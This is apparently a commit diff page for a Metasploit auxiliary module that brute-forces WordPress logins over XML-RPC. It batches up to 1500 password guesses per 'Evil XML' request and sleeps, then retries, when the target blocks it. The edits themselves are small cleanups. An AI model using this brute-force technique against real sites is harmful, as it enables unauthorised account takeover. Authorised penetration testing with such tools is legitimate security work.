Add wordpress masive bruteforce using XMLRPC (wordpress API)
parent
d498dc46a1
commit
b571a79b69
|
@ -56,7 +56,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
|
|
||||||
print_warning('Generating XMLs may take a while depends on the list file(s) size.') if passwords.size > 1500
|
print_warning('Generating XMLs may take a while depends on the list file(s) size.') if passwords.size > 1500
|
||||||
xml_payloads = [] # Container for all generated XMLs
|
xml_payloads = [] # Container for all generated XMLs
|
||||||
xml = ""
|
xml = ''
|
||||||
# Evil XML | Limit number of log-ins to 1500/request for wordpress limitation
|
# Evil XML | Limit number of log-ins to 1500/request for wordpress limitation
|
||||||
passwords.each_slice(1500) do |pass_group|
|
passwords.each_slice(1500) do |pass_group|
|
||||||
|
|
||||||
|
@ -113,9 +113,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
end
|
end
|
||||||
|
|
||||||
def parse_response(res)
|
def parse_response(res)
|
||||||
|
|
||||||
resp.scan(/Incorrect username or password/)
|
resp.scan(/Incorrect username or password/)
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
||||||
def run
|
def run
|
||||||
|
@ -143,10 +141,6 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
|
|
||||||
# Request Parser
|
# Request Parser
|
||||||
req_xml = Nokogiri::Slop xml
|
req_xml = Nokogiri::Slop xml
|
||||||
# Request length
|
|
||||||
# total_req = req_xml.document.methodCall.params.param.value.array.data.value.size
|
|
||||||
# print_status("Totla number of combinations: #{total_req}")
|
|
||||||
|
|
||||||
# Response Parser
|
# Response Parser
|
||||||
res_xml = Nokogiri::Slop response.to_s.scan(/<.*>/).join
|
res_xml = Nokogiri::Slop response.to_s.scan(/<.*>/).join
|
||||||
|
|
||||||
|
@ -164,7 +158,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
end end
|
end end
|
||||||
rescue NoMethodError
|
rescue NoMethodError
|
||||||
print_error("It seems you got blocked!")
|
print_error("It seems you got blocked!")
|
||||||
print_warning("I'll sleep for 6 minutes then I'll try again. CTR+C to exit")
|
print_warning("I'll sleep for 6 minutes then I'll try again. CTR+C to exit")
|
||||||
sleep 6 * 60
|
sleep 6 * 60
|
||||||
retry
|
retry
|
||||||
# return :abort
|
# return :abort
|
||||||
|
|
Loading…
Reference in New Issue